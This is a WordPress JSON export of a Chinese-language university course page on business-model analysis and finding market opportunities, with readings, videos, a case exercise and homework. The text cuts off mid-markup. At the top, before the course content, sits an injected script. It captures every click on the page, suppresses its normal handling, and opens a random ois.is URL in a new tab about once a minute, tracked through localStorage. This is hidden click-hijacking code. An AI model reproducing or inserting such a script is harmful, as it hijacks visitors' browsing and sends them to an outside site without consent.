<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":871,"date":"2014-10-11T11:35:53","date_gmt":"2014-10-11T03:35:53","guid":{"rendered":"http:\/\/edu.secda.info\/phil999_course02\/?page_id=871"},"modified":"2020-02-20T17:52:54","modified_gmt":"2020-02-20T09:52:54","slug":"%e7%ab%a0%e7%af%801-4","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/phil999_course02\/?page_id=871","title":{"rendered":"\u7b2c\u4e94\u9031 \u767c\u73fe\u5e02\u5834\u65b0\u6a5f\u6703"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"871\" class=\"elementor elementor-871\" data-elementor-settings=\"[]\">\r\n\t\t\t\t\t\t<div class=\"elementor-inner\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\r\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-559cb19 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"559cb19\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c7c5187\" data-id=\"c7c5187\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3ce0395 elementor-widget elementor-widget-heading\" data-id=\"3ce0395\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u524d\u6e96\u5099<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-be6c768 elementor-widget elementor-widget-accordion\" data-id=\"be6c768\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1991\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-1991\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u9810\u7fd2\u5167\u5bb9<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1991\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1991\"><p>\u672c\u5468\u4e3b\u8981\u5b78\u7fd2\u904b\u7528\u5546\u696d\u6a21\u5f0f\u5206\u6790\u6cd5\uff0c\u7530\u91ce\u8abf\u67e5\u4e86\u89e3\u76ee\u524d\u5e02\u5834\u72c0\u6cc1\uff0c\u4e26\u8a66\u5716\u767c\u6398\u5e02\u5834\u65b0\u6a5f\u6703\u3002<\/p><p>\u5728L403\u4e0a\u8ab2\uff0c\u6bcf\u7d44\u81ea\u5099\u81f3\u5c11\u4e00\u53f0\u7b46\u96fb(\u5df2\u7d93\u5b8c\u6210\u4e0b\u518dxmind\u5fc3\u667a\u5716\u8edf\u9ad4)\u3002<br \/>\u4e0a\u8ab2\u6642\u4f9d\u7167\u7d44\u5225\u5206\u7d44\u5750\uff0c\u5229\u65bc\u8a0e\u8ad6\u3002\u5c1a\u672a\u5206\u7d44\u8005\u7576\u5929\u518d\u5206\u7d44\u30024~6\u4eba\u4e00\u7d44<\/p><p>\u4e0a\u8ab2\u524d\u5148\u9810\u7fd2:<br \/>1. \u8acb\u5728\u8ab2\u7a0b\u5e73\u53f0\u9078\u55ae&gt;\u5275\u696d\u7af6\u8cfd&gt;\u52df\u8cc7\u5e73\u53f0\uff0c\u95b1\u89bd\u5b78\u9577\u59ca\u5275\u65b0\u7ba1\u7406\u6210\u679c\u3002\u4e26\u9032\u4e00\u6b65\u767c\u60f3\u5718\u968a\u5275\u696d\u65b9\u5411\u3002<br \/>2.\u00a0\u8acb\u5728\u8ab2\u7a0b\u5e73\u53f0\u9078\u55ae&gt;\u4f5c\u696d\u4e0b\u8f09\u8207\u7e73\u4ea4\u5340&gt;\u4f5c\u696d\u4e0b\u8f09\uff0c\u4e0b\u8f09&#8221;\u5be6\u865b\u6574\u5408\u5546\u696d\u6a21\u5f0f\u5206\u6790\u53c3\u8003\u6848\u4f8b&#8221;\uff0c\u53c3\u8003\u5b78\u9577\u59d0\u5206\u6790\u5167\u5bb9\u3002<br \/>3. \u89c0\u770b\u8521\u653f\u5b89\u8001\u5e2b\u5f71\u7247\uff1a\u5546\u696d\u6a21\u5f0f\u518d\u5275\u65b0<br \/><iframe loading=\"lazy\" src=\"https:\/\/video.secda.info:5443\/usc\/vod.jsp?videoName=a26a322e-1461-464b-a532-e6302c2a5caa.mp4\" width=\"100%\" height=\"450\" frameborder=\"0\" data-mce-fragment=\"1\"><\/iframe><br \/>4. \u8521\u8001\u5e2b\u5f71\u7247 : \u5546\u696d\u6a21\u5f0f\u518d\u5275\u65b0\u6848\u4f8b\u5206\u6790<br \/><iframe loading=\"lazy\" src=\"https:\/\/video.secda.info:5443\/usc\/vod.jsp?videoName=a17ad4af-e7e4-46ee-858c-83ede12cad00.mp4\" width=\"100%\" height=\"450\" frameborder=\"0\" data-mce-fragment=\"1\"><\/iframe><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-15df46b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"15df46b\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9a2bda4\" data-id=\"9a2bda4\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fa3690e elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"fa3690e\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7510fa5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7510fa5\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-051e92f\" data-id=\"051e92f\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a5f727 elementor-widget elementor-widget-heading\" data-id=\"4a5f727\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u4e0a\u8ab2\u7d00\u9304<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-c34f3bf elementor-widget elementor-widget-toggle\" data-id=\"c34f3bf\" data-element_type=\"widget\" data-widget_type=\"toggle.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-toggle\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2041\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2041\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u671f\u672b\u5831\u544a\u65b9\u5411 <\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2041\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2041\"><p>\u70ba\u65e2\u6709\u7684\u7522\u696d\u90fd\u66f4\/\u5347\u7d1a(\u5e02\u5834\u4e0a\u5b58\u5728\u7684\u516c\u53f8)\uff0c\u767c\u5c55\u5be6\u865b\u6574\u5408\u5546\u696d\u6a21\u5f0f<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2042\" class=\"elementor-tab-title\" data-tab=\"2\" role=\"tab\" aria-controls=\"elementor-tab-content-2042\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u8a8d\u8b58\u5546\u696d\u6a21\u5f0f<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2042\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"2\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2042\">[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/BM-introduction_v4_20190319.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;600px&#8221; style=&#8221;border:0;&#8221;]\n\n[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/dodohome-vs-USPACE.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;600px&#8221; style=&#8221;border:0;&#8221;]<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2043\" class=\"elementor-tab-title\" data-tab=\"3\" role=\"tab\" aria-controls=\"elementor-tab-content-2043\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u6848\u4f8b\u7df4\u7fd2<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2043\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"3\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2043\"><p>\u6bd4\u8f03\u7530\u88e1\u751c\u96fb\u5546\u8207\u597d\u83ef\u96de\u5e73\u53f0\u4e4b\u92b7\u552e\u96de\u86cb\u4e4b\u5546\u696d\u6a21\u5f0f<br \/>\u4f7f\u7528xmind \u5f9e\u5546\u696d\u6a21\u5f0f\u4e2d\u5206\u6790\u8981\u7d20\u627e\u51fa\u4ed6\u5011\u4e4b\u9593\u76f8\u540c\u8207\u4e0d\u540c\u9ede<\/p><p>\u7530\u88e1\u751c\u96fb\u5b50\u5546\u52d9\u00a0\u00a0<a href=\"https:\/\/www.healthyfood.com.tw\" target=\"_blank\" rel=\"noopener\">https:\/\/www.healthyfood.com.tw<\/a>\/<\/p><p>\u597d\u83ef\u96de\u5e73\u53f0\u00a0\u00a0<a href=\"https:\/\/egg123.com.tw\/index.php\/about_list\" target=\"_blank\" rel=\"noopener\">https:\/\/egg123.com.tw\/index.php\/about_list<\/a><\/p><p>\u597d\u83ef\u96de\u76f8\u95dc\u5a92\u9ad4\u5831\u5c0e\u9023\u7d50\u00a0\u00a0<a href=\"https:\/\/www.ettoday.net\/news\/20170802\/980080.htm\" target=\"_blank\" rel=\"noopener\">https:\/\/www.ettoday.net\/news\/20170802\/980080.htm<\/a><\/p><p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/ZM4hkQYHNhs\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><\/iframe><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2044\" class=\"elementor-tab-title\" data-tab=\"4\" role=\"tab\" aria-controls=\"elementor-tab-content-2044\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u767c\u73fe\u5e02\u5834\u65b0\u6a5f\u6703<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2044\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"4\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2044\"><p>[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/step1BM_V4_20190319.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;600px&#8221; style=&#8221;border:0;&#8221;]<\/p><p>\u5be6\u865b\u6574\u5408\u5546\u696d\u6a21\u5f0f\u7bc4\u672c\u4e0b\u8f09\u9023\u7d50 <a href=\"http:\/\/edu.secda.info\/phil999_course02\/?page_id=1444\/\" target=\"_blank\" rel=\"noopener\">http:\/\/edu.secda.info\/phil999_course02\/?page_id=1444\/<\/a><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6ab0653 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6ab0653\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2d4cc3c\" data-id=\"2d4cc3c\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a4a1bc3 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"a4a1bc3\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cfaeeef elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cfaeeef\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e9c4a08\" data-id=\"e9c4a08\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-06febe4 elementor-widget elementor-widget-heading\" data-id=\"06febe4\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u5f8c\u5b8c\u6210\u4e8b\u9805<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-afa6e88 elementor-widget elementor-widget-accordion\" data-id=\"afa6e88\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1841\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-1841\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u4f5c\u696d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1841\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1841\"><ul><li><strong><span style=\"font-size: 14pt; color: #ff0000;\">\u5468\u4e003\u670825\u65e5\u665a\u4e0a12\u9ede\u6574\uff0c\u6bcf\u7d44\u5fc5\u9808\u5b8c\u62101. \u6311\u9078\u4e09\u5bb6\u63d0\u4f9b\u5c08\u696d\u670d\u52d9\u6216\u7368\u7279\u8056\u54c1<\/span><\/strong><strong><span style=\"font-size: 14pt; color: #ff0000;\">\u7db2\u7ad9\u9032\u884c\u5546\u696d\u6a21\u5f0f\u5206\u6790\uff0c\u5373\u5b8c\u6210\u7b2c\u4e00\u9805&#8221;\u767c\u6398\u5e02\u5834\u65b0\u6a5f\u6703&#8221;\uff0c\u4e26\u5c07\u6a94\u6848\u4e0a\u50b3\u81f3\u5728\u8ab2\u7a0b\u5e73\u53f0&gt;\u4f5c\u696d\u4e0b\u8f09\u8207\u7e73\u4ea4\u5340\uff1e\u300c\u5718\u968a\u4f5c\u696d\u5340\u300d\u3002\u6a94\u6848\u540d\u7a31: \u7b2cX\u7d44_\u7522\u696d\u5225_v1_20190319<\/span><\/strong><\/li><li><span style=\"color: #000000; font-size: 14pt;\">\u5728\u8ab2\u7a0b\u5e73\u53f0&gt;\u4f5c\u696d\u4e0b\u8f09\u8207\u7e73\u4ea4\u5340\uff1e\u6a94\u6848\u4e0b\u8f09\uff1e\u4e0b\u8f09\u300c\u5be6\u865b\u6574\u5408\u5546\u696d\u6a21\u5f0f\u5206\u6790\u67b6\u69cb\u7bc4\u672c\u300dxmind<\/span><\/li><li><a href=\"http:\/\/edu.secda.info\/phil999_course02\/?page_id=1444\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14pt;\">http:\/\/edu.secda.info\/phil999_course02\/?page_id=1444<\/span><\/a><\/li><\/ul><p><span style=\"font-size: 14pt; color: #000000;\">\u203b\u5206\u6790\u65b9\u6cd5:<\/span><\/p><p><span style=\"font-size: 14pt; color: #000000;\">\u6311\u9078\u4e09\u5bb6\u5404\u81ea\u63d0\u4f9b\u5c08\u696d\u670d\u52d9\u6216\u7368\u7279\u5546\u54c1\u7684\u7db2\u7ad9(\u4f46\u6b64\u4e09\u5bb6\u6709\u53ef\u80fd\u53ef\u4ee5\u5408\u4f5c\u6216\u5728\u540c\u4e00\u500b\u7522\u696d\u88e1)\u5206\u6790\/\u76e4\u9ede\uff0c\u521d\u6b65\u4e86\u89e3\u5e02\u5834\u73fe\u6cc1\uff0c\u6700\u7d42\u76ee\u7684\u5c0b\u627e\u8a72\u7db2\u7ad9\u4e0d\u8db3\u6216\u672a\u88ab\u6eff\u8db3\u7684\u5730\u65b9<\/span><\/p><p><span style=\"font-size: 14pt; color: #000000;\">\u672c\u5468\u5148\u5b8c\u6210\u5546\u696d\u6a21\u5f0f\u4e94\u500b\u5206\u6790\u8981\u7d20\u5206\u6790(\u50f9\u503c\u4e3b\u5f35\u3001\u50f9\u503c\u6d3b\u52d5\u3001\u95dc\u9375\u8cc7\u6e90\u3001\u95dc\u9375\u6d41\u7a0b\u3001\u5229\u6f64\u516c\u5f0f)<\/span><\/p><ul><li><span style=\"font-size: 14pt; color: #000000;\">\u5217\u51fa\u5404\u5bb6\u63d0\u51fa\u65e2\u6709\u7684\u50f9\u503c\u4e3b\u5f35 (\u8981\u6eff\u8db3\u9867\u5ba2\u54ea\u4e9b\u9700\u6c42\u3001\u8981\u89e3\u6c7a\u54ea\u4e9b\u75db\u9ede) &#8211; what<\/span><\/li><li><span style=\"font-size: 14pt; color: #000000;\">\u50f9\u503c\u6d3b\u52d5(How\u5982\u4f55\u505a- \u5217\u51fa\u7db2\u7ad9\u63d0\u4f9b\u54ea\u4e9b\u670d\u52d9\u9805\u76ee\u3001\u529f\u80fd\u3001\u65b9\u6cd5\u4f86\u6eff\u8db3\u9700\u6c42\u3001\u89e3\u6c7a\u75db\u9ede)<\/span><\/li><li><span style=\"font-size: 14pt; color: #000000;\">\u4e86\u89e3\u865b\u64ec\u767c\u5c55\u72c0\u6cc1 : \u7d00\u9304\u6bcf\u5bb6\u7db2\u7ad9\u6240\u6709\u7684\u529f\u80fd\u8207\u9078\u55ae\uff0c\u4e26\u8a3b\u660e\u5176\u5b58\u5728\u7684\u5fc5\u8981\u6027<\/span><\/li><li><span style=\"font-size: 14pt; color: #000000;\">\u4e86\u89e3\u5be6\u9ad4\u767c\u5c55\u72c0\u6cc1 : \u5f9e\u7db2\u7ad9\u5c0b\u627e\u662f\u5426\u6709\u5be6\u9ad4\u50f9\u503c\u6d3b\u52d5<\/span><\/li><li><span style=\"font-size: 14pt; color: #000000;\">\u95dc\u9375\u8cc7\u6e90 : \u5217\u51fa\u5408\u4f5c\u5925\u4f34\u6216\u5c08\u696d\u6280\u8853<\/span><\/li><li><span style=\"font-size: 14pt; color: #000000;\">\u95dc\u9375\u6d41\u7a0b : \u5217\u51fa\u670d\u52d9\u6240\u9700\u8981\u7684\u7cfb\u7d71\u3001\u4f5c\u696d\u6d41\u7a0b<\/span><\/li><li><span style=\"font-size: 14pt; color: #000000;\">\u5229\u6f64\u516c\u5f0f : \u5217\u51fa\u6536\u5165\u4f86\u6e90<\/span><\/li><\/ul><p><span style=\"color: #0000ff; font-size: 